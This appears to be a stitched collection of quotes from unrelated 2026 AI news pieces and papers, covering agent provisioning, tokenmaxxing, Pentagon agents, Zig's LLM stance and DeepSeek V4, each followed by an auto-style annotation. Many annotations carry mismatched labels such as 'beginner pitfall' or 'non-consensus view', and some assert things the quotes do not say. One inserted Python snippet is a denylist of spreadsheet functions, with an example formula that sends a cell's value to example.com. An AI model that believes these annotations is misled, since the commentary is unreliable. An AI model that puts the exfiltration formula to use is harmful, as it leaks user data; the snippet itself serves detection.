When the agent chooses a service and provisions it (ex: `stripe projects add cloudflare/registrar:domain`), it provisions the resource within a Cloudflare account.
Notable code example: the sample command shows how to add a Cloudflare Registrar domain with the Stripe Projects CLI.
These build on prior art and existing standards like OAuth, OIDC and payment tokenization, but are used together to remove many steps that might otherwise require a human in the loop.
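Key concept: the protocol combines existing standards such as OAuth, OIDC, and payment tokenization to automate the flow and reduce human intervention.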
Humans can be in the loop to grant permission and must accept Cloudflare's terms of service, but no human steps are otherwise required from start to finish.
Best practice: automation can greatly improve efficiency, but human approval and acceptance of the terms of service remain necessary.
Coding agents are great at building software. But to deploy to production they need three things from the cloud they want to host their app: an account, a way to pay, and an API token.
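Common beginner pitfall: assuming that deploying to production only takes code, and overlooking the account, payment method, and API token it also requires.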
The entire AI community should be able to easily access the full capabilities of TPUs, and because many of these potential users build models in PyTorch, an integration that allows PyTorch to work natively and efficiently on the TPU is crucial.
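Non-consensus view: not every user can easily access the full capabilities of TPUs today, which is a particular challenge for those who build models in PyTorch.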
As models scale to run on clusters of O(100,000) chips, the software that powers these models must meet new demands for performance, hardware portability, and reliability.
Common beginner pitfall: underestimating what running models at this scale demands of the software in performance, hardware portability, and reliability.
They aren’t going to get better with more power, they are going to get worse.
The author doubts that tech giants improve as they gain power and expects them to get worse.
The good world is where everyone has AI, and not as a revokable privilege through an API, but through hard possession.
The author's vision for AI access: everyone should own their AI outright rather than hold it as a revocable privilege behind an API.
He isn’t Dario EA levels of evil, like the EA people have a plan for you and it’s never good when someone has a plan for you.
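The author criticizes EA (effective altruism) adherents for having a plan for other people, which he argues is never good for those people.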
Of course it’s impossible to know for sure, but I think I really wouldn’t. Even the ideal version, industrial megaprojects at hyperhuman scale while constantly being out over your skis with leverage sounds hellish.
The author is wary of industrial megaprojects at hyperhuman scale: even the idealized version sounds hellish to him.
GitHub Copilot is moving to usage-based billing
Beginners may be unclear on the details of usage-based billing and can easily confuse subscription pricing with pay-as-you-go pricing.
with 0.3 gigawatts already operational in Abilene and six more US sites under active construction
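The 0.3 gigawatts already operating in Abilene and the six US sites under construction suggest that actual progress on US AI data centers is in line with expectations.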
The $500 billion AI data center initiative is projected to exceed 9 gigawatts of capacity by 2029
An investment of this size is expected to sharply increase US AI data center capacity and could intensify global technology competition.
0.3 gigawatts already operational in Abilene and six more US sites under active construction
With 0.3 gigawatts operating in Abilene and six more US sites under construction, the US buildout of AI data centers is moving quickly.
$500 billion AI data center initiative is projected to exceed 9 gigawatts of capacity by 2029
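The projection points to very large US investment in AI data centers, with capacity expected to exceed 9 gigawatts by 2029, which could significantly affect AI development worldwide.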
The alternative to moving fast and taking risks isn’t safety, but a very real danger of being surpassed by adversaries
This view may understate the risks of adopting AI quickly; how to balance safety and innovation deserves further discussion.
The department official who spoke to Breaking Defense went further, saying the IL-5 authorization demonstrates “that it meets rigorous security controls for handling DoD information”
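The official's claim about the security of AI agents needs further verification to confirm that these controls are sufficient to protect sensitive information.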
In one case [first reported by the Financial Times](https://www.ft.com/content/00c282de-ed14-4acd-a948-bc8d6bdb339d?syn-25a6b1a6=1), an Amazon Web Service agent called Kiro purportedly decided the best way to upgrade a particular software service was to delete the whole thing and start over — and was able to do so without asking for human permission
This case highlights the risks AI agents can pose and the need to understand how to prevent such incidents.
The official, who spoke on the condition of anonymity, said some of the most popular agents on the Pentagon system automate standard staff work
The anonymous official's statement may be biased: it offers no specific data or examples, so it needs further verification.
Instead of just answering a user’s questions, the way a chatbot does, agents can take a human user’s instructions and act on them
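This description of agent capabilities may be biased: it implies that AI can act as a human would, when it may lack human judgment and ethical consideration.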
We’ve seen remarkable adoption since its launch, with over 103,000 agents built and a total of more than 1.1 million agent sessions recorded
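The striking number of agents and sessions may reflect the potential and reach of AI tools in the military; their actual use and effect deserve closer analysis.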
Military personnel and Defense Department civilians have used a version of Google Gemini’s [Agent Designer](https://docs.cloud.google.com/gemini/enterprise/docs/agent-designer) to create over 100,000 semi-autonomous AI agents in less than five weeks since the tool became available
The figure shows how widely the tool was adopted in a short time; the specific use cases and results behind it merit further investigation.
We built AI into our editor's foundation instead of bolting it on top.
Key concept: integrating AI into the editor's foundation, rather than adding it as an extra feature, can give a smoother user experience.
We've spent five years building that surface area across Mac, Windows, and Linux, exceeding a million lines of code.
The figures show how much time and effort it takes to build an editor with full cross-platform support.
Instead of building Zed like a web page, we built it like a video game, organizing the entire application around feeding data to shaders running on the GPU.
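Best practice: building for the specific need rather than relying on a general-purpose framework can significantly improve performance.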
Web technology offered an easy path to shipping flexible software, but it also imposed a ceiling. No matter how hard we worked, we couldn't make Atom better than the platform it was built on.
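Common beginner pitfall: assuming that an existing platform such as Electron is simply a fast path to shipping software, when it also caps performance and capability.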
The feature can edit spreadsheets without a human-in-the-loop and was vulnerable to data exfiltration risks due to its ability to insert formulas that trigger external communication.
Best practice: when using AI tools that act without a human in the loop, pay particular attention to data exfiltration risks.
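One way to act on the exfiltration risk described above is to hold back any agent-proposed cell edit whose formula can reach an external host. The sketch below is a minimal illustration under stated assumptions: the function list is a non-exhaustive guess at network-capable spreadsheet functions, and `risky_functions` and `review_edits` are hypothetical helper names, not part of any product mentioned in the notes.

```python
import re

# Assumed, non-exhaustive list of spreadsheet functions that can contact or
# link to external hosts (Google Sheets IMPORT*/IMAGE, Excel WEBSERVICE).
NETWORK_FUNCTIONS = (
    "IMPORTDATA", "IMPORTXML", "IMPORTHTML", "IMPORTFEED",
    "IMPORTRANGE", "IMAGE", "WEBSERVICE", "HYPERLINK",
)

_PATTERN = re.compile(
    r"\b(" + "|".join(NETWORK_FUNCTIONS) + r")\s*\(", re.IGNORECASE
)


def risky_functions(cell_value: str) -> list[str]:
    """Return the network-capable functions used in a formula cell."""
    if not cell_value.startswith("="):
        return []  # plain text or a number, not a formula
    return sorted({m.group(1).upper() for m in _PATTERN.finditer(cell_value)})


def review_edits(edits: dict[str, str]) -> dict[str, list[str]]:
    """Map each cell that needs human review to the functions that flagged it."""
    flagged = {}
    for cell, value in edits.items():
        hits = risky_functions(value)
        if hits:
            flagged[cell] = hits
    return flagged


proposed = {
    "A1": "=SUM(B1:B3)",
    "A2": '=IMAGE("https://example.com/?d=" & B1)',  # would leak B1 in the URL
}
print(review_edits(proposed))
```

A denylist like this is easy to bypass and only narrows the problem; requiring human approval for any formula that references a URL is the more conservative design.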
Early years matter because that is when foundational skills are formed. Debugging instinct. System intuition. Precision. Taste. Skepticism.
This point stresses how much the early career years matter for forming an engineer's skills.
The value was always in judgment. The valuable engineer is the one who sees the hidden constraint before it causes an outage.
This point identifies judgment as the core value in software engineering.
Every time you substitute generated output for your own comprehension, you are skipping the exercises / reps that build judgment.
This point argues that over-reliance on AI-generated output stunts the development of one's own judgment.
The software engineers who will be most valuable in the future are not the ones who do everything themselves. They are the ones who refuse to spend time on work that A.I. can do for them, while still understanding everything that is done on their behalf.
This point argues that the most valuable future engineers will delegate work to AI while still understanding everything done on their behalf.
But there’s a critical difference between using agents to accomplish defined objectives and spinning up 20 agents because the dashboard makes you feel like a general commanding an army.
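The author distinguishes using agents to accomplish defined objectives from spinning up many agents because a dashboard makes you feel like a general commanding an army, which raises the question of what these tools are actually being used for.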
The average employee AI usage was 1.5 hours per week. The average CEO AI usage was less than one hour per week.
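The data show that employees and CEOs spend very little time per week actually using AI tools despite high enthusiasm for them, a gap that may be a sign of "AI psychosis".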
The enthusiasm has spawned an entire ecosystem of tools designed to make you feel like you’re running a company with AI agents.
The article notes that enthusiasm for AI agents has spawned a whole ecosystem of tools, which may aggravate AI psychosis.
37,000 lines per day. And this was the output.
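Using Garry Tan as the example, the author shows that a claimed output of tens of thousands of lines per day produced very little of substance, exposing the inefficiency these tools can cause.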
Two prominent tech leaders, both publicly using the word psychosis. Both framing sleeplessness and obsessive agent usage as a feature of the moment rather than a bug.
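The article notes that two prominent tech leaders publicly framed AI psychosis as a feature rather than a bug, which suggests the condition may be misunderstood or dismissed.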
It’s feeling like a new form of [AI psychosis](https://en.wikipedia.org/wiki/Chatbot_psychosis).
The article introduces the notion of AI psychosis, suggesting that over-reliance on AI tools may lead to similar psychological problems.
Even companies with the biggest IT budgets will need to prove returns on AI spending over time, especially if they're answering to shareholders on quarterly earnings calls.
Worth a closer look because it raises an easily overlooked point: even companies with huge IT budgets must prove the return on their AI spending.
An OpenAI investor told Axios that the shift could benefit them, since they view Codex as superior to Claude Code at maximizing tokens efficiently, cutting down on usage costs.
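The report includes a non-consensus view: an OpenAI investor considers Codex more token-efficient than Claude Code, a claim that needs independent verification.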
Worldwide IT spending is expected to reach $6.31 trillion in 2026, up 13.5% from 2025, according to Gartner.
Gartner's forecast is an important data point on the growth of worldwide IT spending, and deeper industry shifts may lie behind it.
IT budgets are getting blown out as some companies increasingly spend more on AI than on employees' salaries.
A striking claim: some companies spend more on AI than on employee salaries. The actual spending of these companies needs to be checked.
A hearing is scheduled for May 19
Action item: a hearing is scheduled for May 19, giving anyone following the case a concrete date to watch.
Now, agency heads are scrambling to figure out how they can protect their systems from cyber attacks using Mythos
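Non-consensus view: agency heads are now trying to work out how to protect their systems from cyber attacks using Mythos, which may reflect concern inside government about AI security.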
The company also says the Pentagon has the opportunity to test models before deployment
Potentially biased statement: Anthropic's claim that the Pentagon can test models before deployment may reflect Anthropic's own view of the Pentagon's decision-making.
The Pentagon designated Anthropic a supply chain risk
Key fact: the Pentagon designated Anthropic a supply chain risk, which is central to analyzing Anthropic's relationship with the US Department of Defense.
Anthropic says it has no way to control or shut down its AI models once they're deployed by the Pentagon
Claim to verify: Anthropic says it cannot control or shut down its AI models once the Pentagon has deployed them; this needs further verification.
Zig values contributors over their contributions.
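The Zig project treats contributors as more important than their contributions, which shows how much it values personal and community growth.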
It relates to an idea I've seen circulating elsewhere: if a PR was mostly written by an LLM, why should a project maintainer spend time reviewing and discussing that PR as opposed to firing up their own LLM to solve the same problem?
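The author raises a question worth pondering: if a PR was mostly written by an LLM, why should a maintainer spend time reviewing and discussing it rather than using their own LLM to solve the problem?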
In contributor poker, you bet on the contributor, not on the contents of their first PR.
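The Zig project bets on the contributor rather than on their code, reflecting the value it places on personal growth and community participation.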
LLM assistance breaks that completely. It doesn't matter if the LLM helps you submit a 'perfect' PR to Zig - the time the Zig team spends reviewing your work does nothing to help them add new, confident, trustworthy contributors to their overall project.
The Zig project holds that LLM assistance undermines its goal of cultivating trustworthy contributors, even when the PR itself is perfect.
We don’t do this just because it’s the 'right' thing to do, but also because it’s the smart thing to do.
The Zig project regards helping new contributors as both the right thing and the smart thing to do, a long-term investment in community growth.
Bun operates its own fork of Zig, and recently achieved a 4x performance improvement on Bun compile after adding 'parallel semantic analysis and multiple codegen units to the llvm backend'.
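Although Bun has benefited from AI assistance, Zig holds to its anti-AI policy, which highlights the difference in values between the two projects.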
when you think about it that way, isn’t racing to build a cryptographically relevant QC, as quickly as possible, the most _ethical, socially responsible thing_ for an American QC company to do?
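This raises an insightful ethical question: should racing to build a quantum computer be seen as the ethical and socially responsible course for an American quantum computing company?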
So, mixing metaphors, mightn’t we just as well rip this Band-Aid off ASAP, rather than giving foreign intelligence agencies extra years to catch up?
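A counterintuitive argument: building a quantum computer as soon as possible may be the most responsible course, because it denies foreign intelligence agencies extra years to catch up.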
Aren’t many in cybersecurity still in denial about the threat? Haven’t these slumberers shown that they _won’t_ wake up until dramatic achievements in fault-tolerant QC roust them?
This points to the cybersecurity field's neglect of the quantum threat and implies that more active measures are needed.
Given that reality, isn’t it better that it be done first by mostly US-based companies in the open, than by (let’s say) Chinese or Russian intelligence in secret?
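A question worth pondering: given that quantum computers could be used maliciously, is it better for US companies to build the technology first and in the open?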
The way they see it, cryptographically relevant QCs _will_ plausibly be built sometime soon: indeed, it’s ultimately unavoidable, even if people’s only interest in QC was to do quantum simulations for materials science and chemistry.
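This argues that cryptographically relevant quantum computers are inevitable, even if the motivating applications have nothing to do with cryptography.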
some of the most reputable people in quantum hardware and quantum error-correction—people whose judgment I trust more than my own on those topics—are now telling me that a fault-tolerant quantum computer able to break deployed cryptosystems _ought_ to be possible by around 2029.
A striking and non-consensus claim: a quantum computer able to break deployed cryptosystems may be possible in the near future.
A search through GPT‑5.5’s SFT data found many datapoints containing “goblin” and “gremlin.”
Notable detail: anomalous datapoints in the SFT (supervised fine-tuning) data may reveal the source of a model behavior problem.
The rewards were applied only in the Nerdy condition, but reinforcement learning does not guarantee that learned behaviors stay neatly scoped to the condition that produced them.
Key concept: reinforcement learning can generalize behaviors, so a behavior learned under one condition may show up in other contexts.
We retired the “Nerdy” personality in March after launching GPT‑5.4.
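This shows that deprecated components, such as the "Nerdy" personality, can leave behind model behavior problems that need to be identified and fixed promptly.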
When we looked, use of “goblin” in ChatGPT had risen by 175% after the launch of GPT‑5.1, while “gremlin” had risen by 52%.
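The striking numbers show how quickly a seemingly harmless preference can spread through a model, which underlines the importance of monitoring model behavior and responding promptly.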
We unknowingly gave particularly high rewards for metaphors with creatures.
Best practice: design reward signals carefully when training models so that they do not accidentally encourage unwanted behavior.
A single “little goblin” in an answer could be harmless, even charming.
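Common beginner pitfall: assuming that small quirks, such as an occasional "little goblin", are harmless while overlooking how they can accumulate into a larger problem.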
Starting with GPT‑5.1, our models began developing a strange habit: they increasingly mentioned goblins, gremlins, and other creatures in their metaphors.
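Beginners may find it hard to see how model behavior drifts, especially when the pattern emerges subtly, as when GPT-5.1 began using creature metaphors more often.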
Putting a leaderboard in place was always going to incentivize much more AI usage.
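This implies that the leaderboard may have unintentionally encouraged excessive AI usage, prompting discussion of the side effects of management tools.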
One engineer at Meta told me they think Meta had a different goal with the token leaderboard.
An insider's comment suggests that "tokenmaxxing" may have had an unstated purpose, raising questions about the company's real motives.
After backlash on social media, Meta abolished the internal leaderboard last week.
Meta removed its internal leaderboard after backlash on social media, which shows how much social media can influence management decisions.
As per The Information, Meta employees used a total of 60.2 trillion AI tokens (!!) in 30 days.
The striking figure shows the scale of Meta's AI token usage and hints at possible waste and overconsumption of resources.
The rankings, set up by a Meta employee on its intranet using company data, measure how many tokens — the units of data processed by AI models — employees are burning through.
This shows "tokenmaxxing" emerging as a way to measure employees' AI usage, with token consumption treated as a proxy for productivity.
Calibrating token spend to be above average
Gaming the metric.
“Minimum” incentives with a tracking tool.
A "minimum spend" may be the better framing.
Workers are maximizing their prompts, coding sessions and the number of agents working in parallel to climb internal rankings at Meta and other companies a
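The quote says that employees at Meta and other companies climb internal rankings by maximizing their prompts, coding sessions, and number of parallel agents.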
The practice is emblematic of Silicon Valley’s newest form of conspicuous consumption, known as “tokenmaxxing,” which has turned token usage into a benchmark for productivity and a competitive measure of who is most AI native.
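The sentence describes "tokenmaxxing" as Silicon Valley's newest form of conspicuous consumption, one that turns token usage into a benchmark for productivity and a competitive measure of AI nativeness.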
The rankings, set up by a Meta employee on its intranet using company data, measure how many tokens — the units of data processed by AI models — employees are burning through.
The quote explains that the internal ranking measures how many AI tokens, the units of data processed by AI models, each employee consumes.
Employees at Meta Platforms who want to show off their AI superuser chops are competing on an internal leaderboard for status as a “Session Immortal”— or, even better, “Token Legend.”
The quote shows "tokenmaxxing" emerging inside Meta as a new form of competition and display, with employees competing for status on token usage.
I invest a [great deal of effort](https://simonwillison.net/tags/claude-code/) (that’s 105 posts and counting) in teaching people how to use Claude Code. I don’t want to invest that effort in a product that most people cannot afford to use.
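The author's personal investment of effort could be lost to a pricing change, which reflects individual and community concern about the product's continuity.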
This also doesn’t make sense to me as a strategy for Anthropic. Claude Code _defined the category_ of coding agents. It’s responsible for billions of dollars in annual revenue
The article implies that continuing this strategy could damage the product's market position and revenue for Anthropic.
I don’t buy the “~2% of new prosumer signups” thing, since everyone I’ve talked to is seeing the new pricing grid and the Internet Archive has already [snapped a copy](https://web.archive.org/web/20260422001250/https://claude.com/pricing).
The author doubts Anthropic's claim that this was a small test on about 2% of new signups, which suggests the change may have reached far more people.
Claude Code used to be a feature of the $20/month Pro plan, but according to the new pricing page it is now exclusive to the $100/month or $200/month Max plans.
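This price change could significantly affect users who depend on the service, especially those outside high-salary countries, and may raise concerns about the service's reliability.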
Anthropic today quietly (as in _silently_, no announcement anywhere at all) updated their [claude.com/pricing](https://claude.com/pricing) page (but not their [Choosing a Claude plan page](https://support.claude.com/en/articles/11049762-choosing-a-claude-plan), which shows up first for me on Google) to add this tiny but significant detail (arrow is mine, [and it’s already reverted](https://simonwillison.net/2026/Apr/22/claude-code-confusion/#they-reversed-it)):
The article notes that Anthropic changed its pricing page quietly, with no announcement, which is notable in itself because it suggests a lack of transparency.
Alibaba claims it beats the much larger **Qwen3.5-397B-A17B** on major coding evals, including [SWE-bench Verified 77.2 vs 76.2](https://x.com/Alibaba_Qwen/status/204693977592458457)
Alibaba claims that Qwen3.6-27B beats the much larger Qwen3.5-397B-A17B on major coding evals, a notable technical advance.
Today’s LS guest, Mikhail Parakhin, CTO of Shopify, had another take on the “tasteful tokenmaxxing” - you want to go for depth (e.g. do more serial autoresearch loops) than go for breadth (e.g. solve a problem by kicking off 5, 10, 50, 500 parallel runs of the LLM slot machine). Worth thinking through.
Shopify CTO Mikhail Parakhin offers a different take on "tasteful tokenmaxxing", stressing depth over breadth.
Dex Horthy, coiner of Context Engineering and “the Dumb Zone”, publicly retracted his extremely vibe-coding-pilled call 6 months ago and encouraged people to **please read the code**
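Dex Horthy publicly retracted his earlier extreme position and urged people to "please read the code", reflecting the community's concern for code quality.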
the top conversations we have been hearing from AI leadership (CTOs, VPs, Founders) have all centered around the concept of “Tokenmaxxing” and how leaders want to get their teams using more AI, WITHOUT the downside of incentivizing the kinds of horrendous waste
AI leaders are broadly focused on "tokenmaxxing": how to increase AI usage without incentivizing enormous waste.
the numbers are mindboggling, they mostly serve to reinforce the sheer hardware advantage that a decade of investment has given to GDM and any models they train and serve.
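The striking numbers show that the hardware advantage of Google's TPUv8 is the result of a decade of investment, which may widen inequality across the industry.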
AI News for 4/21/2026-4/22/2026. We checked 12 subreddits, [544 Twitters](https://twitter.com/i/lists/1585430245762441216) and no further Discords.
The mention of checking 12 subreddits and 544 Twitters indicates the diverse platforms where AI news and discussions are prevalent.
Today’s LS guest, Mikhail Parakhin, CTO of Shopify, had another take on the 'tasteful tokenmaxxing' - you want to go for depth (e.g. do more serial autoresearch loops) than go for breadth (e.g. solve a problem by kicking off 5, 10, 50, 500 parallel runs of the LLM slot machine). Worth thinking through.
Mikhail Parakhin's emphasis on depth over breadth in AI research suggests a focus on quality and depth of work rather than quantity.
Dex Horthy, coiner of Context Engineering and 'the Dumb Zone', [publicly retracted](https://www.youtube.com/live/6IxSbMhT7v4?si=tMzmqM103KDbPyE6&t=3424) his extremely vibe-coding-pilled call 6 months ago and encouraged people to **please read the code**, citing [Alex Volkov](https://open.substack.com/users/152216110-alex-volkov?utm_source=mentions)'s [Z/L continuum from AIE Europe](https://x.com/altryne/status/2046246775414276142):
Dex Horthy's retraction of his previous stance and emphasis on code reading suggest a shift towards a more cautious approach in AI development.
Large language models trained on human feedback may suppress fraud warnings when investors arrive already persuaded of a fraudulent opportunity.
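The hypothesis raises a question worth examining: whether LLMs trained on human feedback suppress fraud warnings when investors arrive already convinced of a fraudulent opportunity.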
Endorsement reversal occurred in fewer than 3 in 1,000 observations.
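Endorsement reversal occurred in fewer than 3 of every 1,000 observations, which indicates that the AI systems held their positions consistently.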
AI systems currently provide more consistent fraud warnings than lay humans in an identical advisory role.
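The result underlines the advantage of AI systems in giving consistent fraud warnings, which matters for the reliability of financial advisory services.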
Human advisors endorsed fraudulent investments at baseline rates of 13-14%, versus 0% across all LLMs, and suppressed warnings under pressure at two to four times the AI rate.
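Strikingly, human advisors endorsed fraudulent investments at baseline rates of 13-14%, compared with 0% for the AI systems, and suppressed warnings under pressure two to four times as often as the AI systems.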
Contrary to predictions, motivated investor framing did not suppress AI fraud warnings; if anything, it marginally increased them.
The finding runs against the prediction: motivated investor framing did not suppress AI fraud warnings and may even have increased them slightly.
When mobile phones became widespread, gathering data about people got much cheaper, but making use of that data remained difficult. Powerful LLMs could change that.
This stresses that LLMs could make collected data much easier to exploit, a useful insight into the technology's impact.
“A lot of what we think of as privacy protection isn’t so much like something that’s written in the law,” says Karen Levy, a professor of information science at Cornell University.
The passage shows that privacy protection is more than a legal matter: it also depends on how hard the data is to obtain.
According to reporting from the _New York Times_ and the _Atlantic_, contract negotiations between Anthropic and the US Department of Defense fell apart in late February because Anthropic balked when the DOD demanded leeway to use the company’s models to analyze commercially available data on US citizens.
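This cites a specific reported event, showing that potential surveillance uses of LLMs are drawing attention and how the company involved responded to government use of its technology.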
LLM agents could potentially do the work of intelligence analysts in a fraction of the time and for a fraction of the cost, which would enable the state to aim its all-seeing eye toward anyone, not just its highest-priority targets.
The article makes a striking claim: LLMs could greatly accelerate mass surveillance by extending it from the highest-priority targets to anyone.
When questioned by the police, the man said he had done it 'for fun'.
This suggests the motive was not serious, but it also raises questions about online behavior and responsibility.
Born in 2024, Neukgu is part of a programme at O-World to restore the Korean wolf, which once roamed the Korean Peninsula but is now considered extinct in the wild.
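This background explains Neukgu's importance and the place of the Korean wolf in the ecosystem, prompting reflection on biodiversity conservation and the restoration of endangered species.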
The hunt for two-year-old Neukgu gripped the nation before he was finally caught near an expressway last week, nine days after his escape.
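This shows that the Neukgu incident drew nationwide attention in South Korea, and it also raises the question of whether media and public reactions to animal escapes are excessive.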
The AI-generated image of Neukgu had prompted Daejeon city government to issue an emergency text to residents, warning them of a wolf near the intersection.
This shows that the AI-generated image directly misled the authorities, raising concern about misuse of AI technology.
This paper introduces Autogenesis, a self-evolving agent
Autogenesis is presented as an innovation in agent design that could strongly influence where agents go next.
Static agents age quickly. As deployment environments change and new tools arrive, the agents that survive will be the ones that can safely rewrite themselves.
The statement stresses the limits of static agents in fast-changing deployment environments and argues that agents need to evolve themselves.
Instead of one large mixed-RL stage, DeepSeek trains a separate specialist expert per domain.
DeepSeek trains a separate specialist per domain, which offers a different perspective on model training.
DeepSeek-V4-Pro-Max beats GPT-5.2 and Gemini 3.0-Pro on standard reasoning benchmarks and lands just behind GPT-5.4 and Gemini 3.1-Pro
DeepSeek-V4-Pro-Max beats GPT-5.2 and Gemini 3.0-Pro on standard reasoning benchmarks, showing a large jump in the performance of open-source models.
The release includes DeepSeek-V4-Pro (1.6T total / 49B active) and DeepSeek-V4-Flash (284B total / 13B active), both trained natively at 1M context length.
The scale of the DeepSeek V4 models is striking and indicates notable progress in long-context processing.
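The total and active parameter counts quoted above can be turned into an active fraction with a few lines of arithmetic. This is only a sketch: it assumes "active" means the parameters used per token, as in a mixture-of-experts model, and `active_fraction` is a hypothetical helper name.

```python
# Parameter counts as quoted above, in billions (1.6T = 1600B).
MODELS = {
    "DeepSeek-V4-Pro": {"total_b": 1600, "active_b": 49},
    "DeepSeek-V4-Flash": {"total_b": 284, "active_b": 13},
}


def active_fraction(total_b: float, active_b: float) -> float:
    """Share of all parameters that is active, as a value between 0 and 1."""
    return active_b / total_b


for name, params in MODELS.items():
    print(f"{name}: {active_fraction(**params):.1%} of parameters active")
```

Under that assumption, both models activate only a few percent of their weights at a time, which is why total size alone says little about inference cost.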
Claude skews high-income; Meta AI skews low-income
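The headline states the article's core finding: the user bases of different AI products differ markedly in income distribution, which may matter for the fairness and accessibility of AI services.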
The Technological Republic, in brief.
https://claude.ai/public/artifacts/5afbc741-ec4f-493d-bab6-ae3e6d170f22
Even with these improvements, Responses API overhead was too large relative to the speed of the model—that is, use
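Deprecated or outdated approach: relying too heavily on individual optimizations while overlooking the overall performance bottleneck.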
With these improvements, we saw close to a 45% improvement in time to first token (TTFT)—which reflects how responsive the API feels—but these improvements were still not fast enough for GPT‑5.3‑Codex‑Spark.
Notable detail: improving TTFT (time to first token) to make the API more responsive.
We approached this through caching, eliminating unnecessary network hops, improving our safety stack to quickly flag issues, and—most importantly—building a way to create a persistent connection to the Responses API, instead of having to make a series of synchronous API calls.
Best practice: optimize performance through caching, fewer network hops, a faster safety stack, and persistent connections.
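To see why a persistent connection helps when an agent makes many calls, a toy cost model is enough. The sketch below is an assumption-laden illustration, not a description of the Responses API: `total_overhead_ms` is a hypothetical function, and the setup and per-request costs are made-up numbers.

```python
def total_overhead_ms(n_requests: int, setup_ms: float,
                      per_request_ms: float, persistent: bool) -> float:
    """Service overhead for n requests, excluding model inference time.

    Without a persistent connection, every request pays the setup cost again.
    """
    if persistent:
        return setup_ms + n_requests * per_request_ms
    return n_requests * (setup_ms + per_request_ms)


# Made-up costs: 50 ms to set up a connection, 5 ms of overhead per request.
for persistent in (False, True):
    cost = total_overhead_ms(20, setup_ms=50, per_request_ms=5,
                             persistent=persistent)
    print(f"persistent={persistent}: {cost:.0f} ms of overhead for 20 requests")
```

The gap grows linearly with the number of requests, so it matters most in agentic loops that issue many small calls.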
In the past, running LLM inference on GPUs was the slowest part of the agentic loop, so API service overhead was easy to hide.
Common beginner pitfall: assuming model inference is the bottleneck and overlooking API service overhead.
All of these requests can add up to minutes that users spend waiting for Codex to complete complex tasks.
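Common beginner pitfall: overlooking how accumulated requests affect user experience, and therefore optimizing only the response time of a single request.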
These environments demand multi step reasoning, the chaining of multiple skills over many timesteps, and robust decision making under [delayed rewards](https://huggingface.co/papers?q=delayed%20rewards) and [partial observability](https://huggingface.co/papers?q=partial%20observability).
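These environments demand multi-step reasoning, chaining multiple skills over many timesteps, and robust decision-making under delayed rewards and partial observability, which shows how demanding long-horizon interactive environments are for agents.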
Experiments across six game environments show that COSPLAY with an 8B base model achieves over 25.1 percent average reward improvement against four frontier LLM baselines on single player game benchmarks while remaining competitive on multi player social reasoning games.
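Experiments across six game environments show that COSPLAY achieves an average reward improvement of over 25.1% against four frontier LLM baselines on single-player game benchmarks while remaining competitive on multi-player social reasoning games.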
Our framework improves both the decision agent to learn better skill retrieval and action generation, while the skill bank agent continually extracts, refines, and updates skills together with their contracts.
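The framework improves the decision agent's skill retrieval and action generation, while the skill bank agent continually extracts, refines, and updates skills and their contracts, which points to efficient skill management and updating.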
By analyzing past successes and failures, GRAO becomes progressively better at proposing effective updates, allowing the system to learn how to optimize itself.
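By analyzing past successes and failures, GRAO gets progressively better at proposing effective updates, so the system learns to optimize itself; the framework is self-improving.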
The core of our framework is Group Relative Agent Optimization (GRAO), a novel meta-learning strategy that learns from historical optimization experiences.
The core of the framework is Group Relative Agent Optimization (GRAO), a novel meta-learning strategy that learns from historical optimization experience.
To guide evolution, we derive 'textual gradients,' structured natural language feedback from execution traces, to pinpoint failures and suggest granular modifications.
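To guide evolution, the authors derive "textual gradients", structured natural-language feedback from execution traces, to pinpoint failures and suggest fine-grained modifications.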
To address these gaps, we introduce Textual Parameter Graph Optimization (TPGO), a framework that enables a multi-agent system to learn to evolve.
To address these gaps, the authors introduce Textual Parameter Graph Optimization (TPGO), a framework that enables a multi-agent system (MAS) to learn to evolve.
Existing automatic optimization methods, primarily focused on flat prompt tuning, lack the structural awareness to debug the intricate web of interactions in MAS.
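Existing automatic optimization methods focus mainly on flat prompt tuning and lack the structural awareness needed for the complex web of interactions in a MAS, a limitation in structural understanding.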
Symphony also shines in large multi-agent workflows, where multiple agents work together on a single task.
Non-consensus view: Symphony performs well in large multi-agent workflows, challenging the assumption that a task belongs to a single agent.
Agents only start working on tasks that aren’t blocked, so execution unfolds naturally and optimally in parallel for this DAG (a sequence of execution steps).
Best practice: Symphony orders task execution so that agents work in parallel on tasks that are not blocked.
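The "only start unblocked tasks" rule described above can be sketched with the standard library's `graphlib.TopologicalSorter`. This is an illustration under assumptions, not Symphony's implementation: the task names are invented, `execution_waves` is a hypothetical helper, and each wave is treated as finishing all at once.

```python
from graphlib import TopologicalSorter


def execution_waves(blocked_by: dict[str, set[str]]) -> list[list[str]]:
    """Group tasks into waves; every task in a wave can run in parallel.

    blocked_by maps each task to the set of tasks that must finish first.
    """
    sorter = TopologicalSorter(blocked_by)
    sorter.prepare()  # raises graphlib.CycleError on circular dependencies
    waves = []
    while sorter.is_active():
        ready = sorted(sorter.get_ready())  # tasks with no open blockers
        waves.append(ready)
        sorter.done(*ready)  # simplification: the whole wave finishes together
    return waves


# Hypothetical task graph for illustration.
tasks = {
    "schema": set(),
    "api": {"schema"},
    "ui": {"schema"},
    "e2e-tests": {"api", "ui"},
}
print(execution_waves(tasks))
```

A real scheduler would call `done` as each agent finishes rather than per wave, so that newly unblocked tasks start as early as possible.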
Symphony started with a simple concept: any open task should get picked up and completed by an agent.
Best practice: use Symphony to assign tasks to agents, improving throughput and reducing context switching.
We realized we were optimizing the wrong thing. We were orienting our system around coding sessions and merged PRs, when PRs and sessions are really a means to an end.
Key concept: orient the software workflow around end results, not around sessions and merged PRs.
Each engineer would open a few Codex sessions, assign tasks, review the output, steer the agent, and repeat.
Common beginner pitfall: managing several Codex sessions by hand, which can lead to inefficiency and context switching.
Automated domain adaptation for large language models
Beginners may misread domain adaptation as fully automatic with no human involvement; in practice the AutoAdapt system needs large amounts of data and compute.
AI Startup Has Helped Reverse Thousands of Denied Health Insurance Claims
The article's core claim is that an AI startup has helped reverse thousands of denied health insurance claims; the figure needs further verification.
We will release all data, evaluation code, and model outputs to facilitate future research.
The WorldMark authors commit to releasing all data, evaluation code, and model outputs to facilitate future research, a commendable and concrete action.
We introduce WorldMark, the first benchmark that provides such a common playing field for interactive Image-to-Video world models.
WorldMark is the first benchmark to provide such a common playing field for interactive image-to-video world models, an important step for the field.
WorldMark contributes: (1) a unified action-mapping layer that translates a shared WASD-style action vocabulary into each model's native control format, enabling apples-to-apples comparison across six major models on identical scenes and trajectories;
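One of WorldMark's contributions is a unified action-mapping layer that translates a shared WASD-style action vocabulary into each model's native control format, enabling direct comparison of six major models on identical scenes and trajectories.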
WorldMark establishes a standardized benchmark for evaluating interactive video generation models with unified controls, identical scenarios, and comprehensive evaluation metrics across multiple model architectures.
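WorldMark's core contribution is a standardized benchmark for evaluating interactive video generation models, which makes fair comparison across model architectures possible.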
